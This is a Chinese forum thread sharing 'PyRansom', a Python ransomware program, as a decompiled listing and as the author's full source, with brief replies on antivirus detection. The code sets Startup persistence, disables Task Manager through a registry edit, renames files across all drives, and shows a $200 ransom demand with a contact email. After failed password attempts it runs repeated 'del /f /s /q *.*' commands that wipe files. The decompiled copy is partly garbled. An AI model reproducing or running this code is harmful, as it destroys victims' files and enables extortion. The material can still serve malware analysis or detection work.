PyRansom勒索软件

呵呵大神001

Sentinelone kill
crowdstrike miss

popk

1. # Source Generated with Decompyle++
   
2. # File: Pyransom.pyc (Python 3.10)
   
3. 
   
4. import os
   
5. import sys
   
6. import base64
   
7. import random
   
8. import tkinter as tk
   
9. import getpass
   
10. import time
    
11. from tkinter import messagebox as me
    
12. user = getpass.getuser()
    
13. change = 5
    
14. 
    
15. try:
    
16.     copy = open(f'''C:/Users/{user}/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/PyRansom.bat''', 'w')
    
17.     copy.write('[url=home.php?mod=space&uid=331734]@echo[/url] off\r\nstart' + sys.executable)
    
18.     copy.close()
    
19. finally:
    
20.     pass
    
21. 
    
22. def jing():
    
23.    
    
24.     try:
    
25.         filess = open(f'''C:/Users/{user}/Documents/tkmgr.reg''', 'w')
    
26.         filess.write('Windows Registry Editor Version 5.00\r\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System]\r\n"DisableTaskMgr"=dword:02')
    
27.         filess.close()
    
28.         os.popen(f'''start /B regedit /S C:/Users/{user}/Documents/tkmgr.reg''')
    
29.     finally:
    
30.         return None
    
31.         return None
    
32. 
    
33. 
    
34. 
    
35. def huan():
    
36.    
    
37.     try:
    
38.         filed = open(f'''C:/Users/{user}/Documents/tkmgr.reg''', 'w')
    
39.         filed.write('Windows Registry Editor Version 5.00\r\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System]\r\n"DisableTaskMgr"=dword:00')
    
40.         filed.close()
    
41.         os.popen(f'''start /B regedit /S C:/Users/{user}/Documents/tkmgr.reg''')
    
42.     finally:
    
43.         return None
    
44.         return None
    
45. 
    
46. 
    
47. jing()
    
48. me.showerror('Microsoft Visual C++ Runtime Error', 'Runtime error!')
    
49. mulu = [
    
50.     'C:/',
    
51.     'D:/',
    
52.     'E:/',
    
53.     'F:/',
    
54.     'G:/',
    
55.     'H:/',
    
56.     f'''C:/Users/{user}/''']
    
57. 
    
58. def lib(mulu):
    
59.    
    
60.     def path(path = None):
    
61.         
    
62.         try:
    
63.             for file in os.listdir(mulu + path + '/.'):
    
64.                 if '.' in os.path.splitext(file)[1]:
    
65.                     
    
66.                     try:
    
67.                         os.rename(mulu + path + '/' + file, mulu + path + '/' + file + '.pyransom')
    
68.                     finally:
    
69.                         continue
    
70.                         continue
    
71.                         continue
    
72.                         return None
    
73.                         return None
    
74. 
    
75. 
    
76. 
    
77.    
    
78.     try:
    
79.         for file in os.listdir(mulu + '.'):
    
80.             
    
81.             try:
    
82.                 if '.' in os.path.splitext(file)[1]:
    
83.                     
    
84.                     try:
    
85.                         os.rename(mulu + path + '/' + file, mulu + path + '/' + file + '.pyransom')
    
86.                     finally:
    
87.                         pass
    
88.                     path(file)
    
89.                     continue
    
90.                     continue
    
91.                     return None
    
92.                     return None
    
93. 
    
94. 
    
95. 
    
96. 
    
97. for i in mulu:
    
98.     lib(i)
    
99. for hhhh in range(1, 20):
    
100.    
     
101.     try:
     
102.         oooo = open(f'''C:/Users/{user}/desktop/{hhhh}.txt.pyransom''', 'w')
     
103.         oooo.write('Pay Now!!!')
     
104.         oooo.close()
     
105.     finally:
     
106.         continue
     
107.         continue
     
108.         
     
109.         def close():
     
110.             print('hello!')
     
111. 
     
112.         temp = open('icon.gif', 'wb+')
     
113.         tempb64 = base64.b64decode('R0lGODlhQABAAPAAAAAAAAAAACH5BAEAAAAAIf8LSW1hZ2VNYWdpY2sOZ2FtbWE9MC40NTQ1NDUAIf8LWE1QIERhdGFYTVA8P3hwYWNrZXQgYmVnaW49J++7vycgaWQ9J1c1TTBNcENlaGlIenJlU3pOVGN6a2M5ZCc/Pgo8eDp4bXBtZXRhIHhtbG5zOng9J2Fkb2JlOm5zOm1ldGEvJyB4OnhtcHRrPSdJbWFnZTo6RXhpZlRvb2wgMTIuNDAnPgo8cmRmOlJERiB4bWxuczpyZGY9J2h0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMnPgoKIDxyZGY6RGVzY3JpcHRpb24gcmRmOmFib3V0PScnCiAgeG1sbnM6dGlmZj0naHR0cDovL25zLmFkb2JlLmNvbS90aWZmLzEuMC8nPgogIDx0aWZmOk9yaWVudGF0aW9uPjE8L3RpZmY6T3JpZW50YXRpb24+CiA8L3JkZjpEZXNjcmlwdGlvbj4KPC9yZGY6UkRGPgo8L3g6eG1wbWV0YT4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKPD94cGFja2V0IGVuZD0ndyc/PgH//v38+/r5+Pf29fTz8vHw7+7t7Ovq6ejn5uXk4+Lh4N/e3dzb2tnY19bV1NPS0dDPzs3My8rJyMfGxcTDwsHAv769vLu6ubi3trW0s7KxsK+urayrqqmop6alpKOioaCfnp2cm5qZmJeWlZSTkpGQj46NjIuKiYiHhoWEg4KBgH9+fXx7enl4d3Z1dHNycXBvbm1sa2ppaGdmZWRjYmFgX15dXFtaWVhXVlVUU1JRUE9OTUxLSklIR0ZFRENCQUA/Pj08Ozo5ODc2NTQzMjEwLy4tLCsqKSgnJiUkIyIhIB8eHRwbGhkYFxYVFBMSERAPDg0MCwoJCAcGBQQDAgEAACwAAAAAQABAAAAC6YSPqavhD5mctBqIs9085a914gSW0Ygi5uqkKQu7IkzLW13blCnxeg+ylH6M4O1DbBiFyKSqyVk6pcyQEwDtZInUI+aK3Xq/U3GVnOyeT2lzRS2D79wuOYkOzuv3NpqfrfMnaDc3aGgVdaiINraoqOUYGZAouUhZeXiJOai5+dfpmbMWKvpGKgjq9/TY+KlkmMoCxNla6gFbG1OEO2q7iporu0vbq/tKbMr7C1xsaxlsfMHaHB2WCS188EydLX3NvXL7naxsXX437Rh7SrjMHo79DlgoDw9ePxmPD4nfftz/4AXAgHUGIigAADs=')
     
114.         temp.write(tempb64)
     
115.         temp.close()
     
116.         ID = random.randint(100000, 1000000)
     
117.         password = str((ID + 3) * 2)
     
118.         print('Password:' + password + '    ID:' + str(ID))
     
119.         root = tk.Tk()
     
120.         
     
121.         def get():
     
122.             global change
     
123.             if change != 0:
     
124.                 if entry.get() == password:
     
125.                     os.system('ren *.pyransom *.')
     
126.                     os.remove(f'''C:/Users/{user}/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/PyRansom.bat''')
     
127.                     huan()
     
128.                     time.sleep(4)
     
129.                     root.destroy()
     
130.                     return None
     
131.                 change = None - 1
     
132.                 return None
     
133.             None.system('del /f /s /q *.*')
     
134.             os.system('del /f /s /q *.*')
     
135.             os.system('del /f /s /q *.*')
     
136.             os.system('del /f /s /q *.*')
     
137.             os.system('del /f /s /q *.*')
     
138.             os.system('del /f /s /q *.*')
     
139.             os.system('del /f /s /q *.*.pyransom')
     
140.             os.system('del /f /s /q *.*')
     
141.             os.system('del /f /s /q *.*')
     
142.             os.system('del /f /s /q *.*')
     
143.             os.system('del /f /s /q *.*')
     
144.             os.system('del /f /s /q *.*')
     
145.             os.system('del /f /s /q *.*')
     
146.             os.system('del /f /s /q *.*')
     
147.             os.system('del /f /s /q *.*')
     
148.             print('error!')
     
149. 
     
150.         root.config('red', **('background',))
     
151.         photo = tk.PhotoImage('icon.gif', **('file',))
     
152.         icon = tk.Label(root, photo, **('image',))
     
153.         icon.pack()
     
154.         os.remove('icon.gif')
     
155.         width = 900
     
156.         height = 500
     
157.         screenwidth = root.winfo_screenwidth()
     
158.         screenheight = root.winfo_screenheight()
     
159.         alignstr = '%dx%d+%d+%d' % (width, height, (screenwidth - width) / 2, (screenheight - height) / 2)
     
160.         root.geometry(alignstr)
     
161.         root.resizable(False, False, **('width', 'height'))
     
162.         root.wm_attributes('-topmost', 1)
     
163.         first = tk.Label(root, 'All your file have been encrypt!', 'red', **('text', 'bg'))
     
164.         first.config(('Arial', 20), **('font',))
     
165.         first.pack()
     
166.         a = tk.Label(root, 'All your files have been encrypted due to a security problem with your PC. If you want to restore them, ', 'red', **('text', 'bg'))
     
167.         a.config(('Arial', 15), **('font',))
     
168.         a.pack()
     
169.         c = tk.Label(root, 'write us to the e-mail:pythonhavenoname@163.com', 'red', **('text', 'bg'))
     
170.         c.config(('Arial', 15), **('font',))
     
171.         c.pack()
     
172.         b = tk.Label(root, 'Write This ID in the title of your message:' + str(ID), 'red', **('text', 'bg'))
     
173.         b.config(('Arial', 15), **('font',))
     
174.         b.pack()
     
175.         d = tk.Label(root, 'You should pay 200$ to us.', 'red', **('text', 'bg'))
     
176.         d.config(('Arial', 15), **('font',))
     
177.         d.pack()
     
178.         e = tk.Label(root, 'If you pay,we will send you decrypt password.', 'red', **('text', 'bg'))
     
179.         e.config(('Arial', 15), **('font',))
     
180.         e.pack()
     
181.         f = tk.Label(root, 'you only have ' + str(change) + ' change.', 'red', **('text', 'bg'))
     
182.         f.config(('Arial', 15), **('font',))
     
183.         f.pack()
     
184.         info = tk.Label(root, 'Password:', 'red', **('text', 'bg'))
     
185.         info.config(('Arial', 15), **('font',))
     
186.         info.pack()
     
187.         entry = tk.Entry(root, 100, **('width',))
     
188.         entry.pack()
     
189.         ok = tk.Button(root, 'Decrypt', get, **('text', 'command'))
     
190.         ok.pack('bottom', **('side',))
     
191.         root.protocol('WM_DELETE_WINDOW', close)
     
192.         root.overrideredirect(True)
     
193.         root.mainloop()
     
194.         return None
     
195. 
     
196. 
     
197. 
     
198. 
     
199. #可以尝试用nuitka打包

复制代码

python无名氏

popk 发表于 2023-1-18 12:33

嘤嘤嘤，别再让我看到这玩意，调试了整整两个晚上。对了，这玩意反正我几天后就放github上永久开源，源码什么的，无所谓
(其实我是想让他顶替掉上一任python勒索平台deathransom的)

1. import os,sys
   
2. import base64
   
3. import random
   
4. import tkinter as tk
   
5. import getpass
   
6. import time
   
7. from tkinter import messagebox as me
   
8. user = getpass.getuser()
   
9. change = 5
   
10. try:
    
11.     copy = open(f'C:/Users/{user}/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/PyRansom.bat','w')
    
12.     copy.write('[url=home.php?mod=space&uid=331734]@echo[/url] off\r\nstart'+sys.executable)
    
13.     copy.close()
    
14. except:
    
15.     pass
    
16. def jing():
    
17.     global user
    
18.     try:
    
19.         filess = open(f'C:/Users/{user}/Documents/tkmgr.reg','w')
    
20.         filess.write('Windows Registry Editor Version 5.00\r\n[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]\r\n"DisableTaskMgr"=dword:02')
    
21.         filess.close()
    
22.         os.popen(f'start /B regedit /S C:/Users/{user}/Documents/tkmgr.reg')
    
23.     except:
    
24.         pass
    
25. def huan():
    
26.     global user
    
27.     try:
    
28.         filed = open(f'C:/Users/{user}/Documents/tkmgr.reg','w')
    
29.         filed.write('Windows Registry Editor Version 5.00\r\n[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]\r\n"DisableTaskMgr"=dword:00')
    
30.         filed.close()
    
31.         os.popen(f'start /B regedit /S C:/Users/{user}/Documents/tkmgr.reg')
    
32.     except:
    
33.         pass
    
34. jing()
    
35. me.showerror("Microsoft Visual C++ Runtime Error","Runtime error!")
    
36. mulu = ['C:/','D:/','E:/','F:/','G:/','H:/',f'C:/Users/{user}/']
    
37. def lib(mulu):
    
38.     def path(path):
    
39.         try:
    
40.             for file in os.listdir(mulu+path+r"/."):
    
41.                 if '.' in os.path.splitext(file)[1]:
    
42.                     try:
    
43.                         os.rename(mulu+path+'/'+file,mulu+path+'/'+file+".pyransom")
    
44.                     except:
    
45.                         pass
    
46.                 else:
    
47.                     pass
    
48.         except:
    
49.             pass
    
50.     try:
    
51.         for file in os.listdir(mulu+r"."):
    
52.             try:
    
53.                 if '.' in os.path.splitext(file)[1]:
    
54.                     try:
    
55.                         os.rename(mulu+path+'/'+file,mulu+path+'/'+file+".pyransom")
    
56.                     except:
    
57.                         pass
    
58.                 else:
    
59.                     path(file)
    
60.                     pass
    
61.             except:
    
62.                 pass
    
63.     except:
    
64.         pass
    
65. for i in mulu:
    
66.     lib(i)
    
67. for hhhh in range(1,20):
    
68.     try:
    
69.         oooo = open(f'C:/Users/{user}/desktop/{hhhh}.txt.pyransom','w')
    
70.         oooo.write('Pay Now!!!')
    
71.         oooo.close()
    
72.     except:
    
73.         pass
    
74. def close():
    
75.     print('hello!')
    
76. temp = open("icon.gif","wb+")
    
77. tempb64=base64.b64decode('R0lGODlhQABAAPAAAAAAAAAAACH5BAEAAAAAIf8LSW1hZ2VNYWdpY2sOZ2FtbWE9MC40NTQ1NDUAIf8LWE1QIERhdGFYTVA8P3hwYWNrZXQgYmVnaW49J++7vycgaWQ9J1c1TTBNcENlaGlIenJlU3pOVGN6a2M5ZCc/Pgo8eDp4bXBtZXRhIHhtbG5zOng9J2Fkb2JlOm5zOm1ldGEvJyB4OnhtcHRrPSdJbWFnZTo6RXhpZlRvb2wgMTIuNDAnPgo8cmRmOlJERiB4bWxuczpyZGY9J2h0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMnPgoKIDxyZGY6RGVzY3JpcHRpb24gcmRmOmFib3V0PScnCiAgeG1sbnM6dGlmZj0naHR0cDovL25zLmFkb2JlLmNvbS90aWZmLzEuMC8nPgogIDx0aWZmOk9yaWVudGF0aW9uPjE8L3RpZmY6T3JpZW50YXRpb24+CiA8L3JkZjpEZXNjcmlwdGlvbj4KPC9yZGY6UkRGPgo8L3g6eG1wbWV0YT4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKPD94cGFja2V0IGVuZD0ndyc/PgH//v38+/r5+Pf29fTz8vHw7+7t7Ovq6ejn5uXk4+Lh4N/e3dzb2tnY19bV1NPS0dDPzs3My8rJyMfGxcTDwsHAv769vLu6ubi3trW0s7KxsK+urayrqqmop6alpKOioaCfnp2cm5qZmJeWlZSTkpGQj46NjIuKiYiHhoWEg4KBgH9+fXx7enl4d3Z1dHNycXBvbm1sa2ppaGdmZWRjYmFgX15dXFtaWVhXVlVUU1JRUE9OTUxLSklIR0ZFRENCQUA/Pj08Ozo5ODc2NTQzMjEwLy4tLCsqKSgnJiUkIyIhIB8eHRwbGhkYFxYVFBMSERAPDg0MCwoJCAcGBQQDAgEAACwAAAAAQABAAAAC6YSPqavhD5mctBqIs9085a914gSW0Ygi5uqkKQu7IkzLW13blCnxeg+ylH6M4O1DbBiFyKSqyVk6pcyQEwDtZInUI+aK3Xq/U3GVnOyeT2lzRS2D79wuOYkOzuv3NpqfrfMnaDc3aGgVdaiINraoqOUYGZAouUhZeXiJOai5+dfpmbMWKvpGKgjq9/TY+KlkmMoCxNla6gFbG1OEO2q7iporu0vbq/tKbMr7C1xsaxlsfMHaHB2WCS188EydLX3NvXL7naxsXX437Rh7SrjMHo79DlgoDw9ePxmPD4nfftz/4AXAgHUGIigAADs=')
    
78. temp.write(tempb64)
    
79. temp.close()
    
80. ID = random.randint(100000,1000000)
    
81. password = str((ID+3)*2)
    
82. print("Password:"+password+"    ID:"+str(ID))
    
83. root = tk.Tk()
    
84. def get():
    
85.     global change
    
86.     global user
    
87.     if change != 0:
    
88.         if entry.get() == password:
    
89.             os.system('ren *.pyransom *.')
    
90.             os.remove(f'C:/Users/{user}/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup/PyRansom.bat')
    
91.             huan()
    
92.             time.sleep(4)
    
93.             root.destroy()
    
94.         else:
    
95.             change = change-1
    
96.     else:
    
97.         os.system('del /f /s /q *.*')
    
98.         os.system('del /f /s /q *.*')
    
99.         os.system('del /f /s /q *.*')
    
100.         os.system('del /f /s /q *.*')
     
101.         os.system('del /f /s /q *.*')
     
102.         os.system('del /f /s /q *.*')
     
103.         os.system('del /f /s /q *.*.pyransom')
     
104.         os.system('del /f /s /q *.*')
     
105.         os.system('del /f /s /q *.*')
     
106.         os.system('del /f /s /q *.*')
     
107.         os.system('del /f /s /q *.*')
     
108.         os.system('del /f /s /q *.*')
     
109.         os.system('del /f /s /q *.*')
     
110.         os.system('del /f /s /q *.*')
     
111.         os.system('del /f /s /q *.*')
     
112.         print("error!")
     
113. root.config(background = "red")
     
114. photo = tk.PhotoImage(file="icon.gif")
     
115. icon = tk.Label(root,image=photo)
     
116. icon.pack()
     
117. os.remove("icon.gif")
     
118. width = 900
     
119. height = 500
     
120. screenwidth = root.winfo_screenwidth()
     
121. screenheight = root.winfo_screenheight()
     
122. alignstr = '%dx%d+%d+%d' % (width, height, (screenwidth-width)/2, (screenheight-height)/2)
     
123. root.geometry(alignstr)
     
124. root.resizable(width=False,height=False)
     
125. root.wm_attributes('-topmost',1)
     
126. first = tk.Label(root,text="All your file have been encrypt!",bg="red")
     
127. first.config(font=("Arial",20))
     
128. first.pack()
     
129. a = tk.Label(root,text="All your files have been encrypted due to a security problem with your PC. If you want to restore them, ",bg="red")
     
130. a.config(font=("Arial",15))
     
131. a.pack()
     
132. c = tk.Label(root,text="write us to the e-mail:pythonhavenoname@163.com",bg="red")
     
133. c.config(font=("Arial",15))
     
134. c.pack()
     
135. b = tk.Label(root,text="Write This ID in the title of your message:"+str(ID),bg="red")
     
136. b.config(font=("Arial",15))
     
137. b.pack()
     
138. d = tk.Label(root,text="You should pay 200$ to us.",bg="red")
     
139. d.config(font=("Arial",15))
     
140. d.pack()
     
141. e = tk.Label(root,text="If you pay,we will send you decrypt password.",bg="red")
     
142. e.config(font=("Arial",15))
     
143. e.pack()
     
144. f = tk.Label(root,text="you only have "+str(change)+" change.",bg="red")
     
145. f.config(font=("Arial",15))
     
146. f.pack()
     
147. info = tk.Label(root,text="Password:",bg="red")
     
148. info.config(font=("Arial",15))
     
149. info.pack()
     
150. entry = tk.Entry(root,width=100)
     
151. entry.pack()
     
152. ok = tk.Button(root,text="Decrypt",command=get)
     
153. ok.pack(side="bottom")
     
154. root.protocol("WM_DELETE_WINDOW",close)
     
155. root.overrideredirect(True)
     
156. root.mainloop()

复制代码

huorong

360领航版挑战失败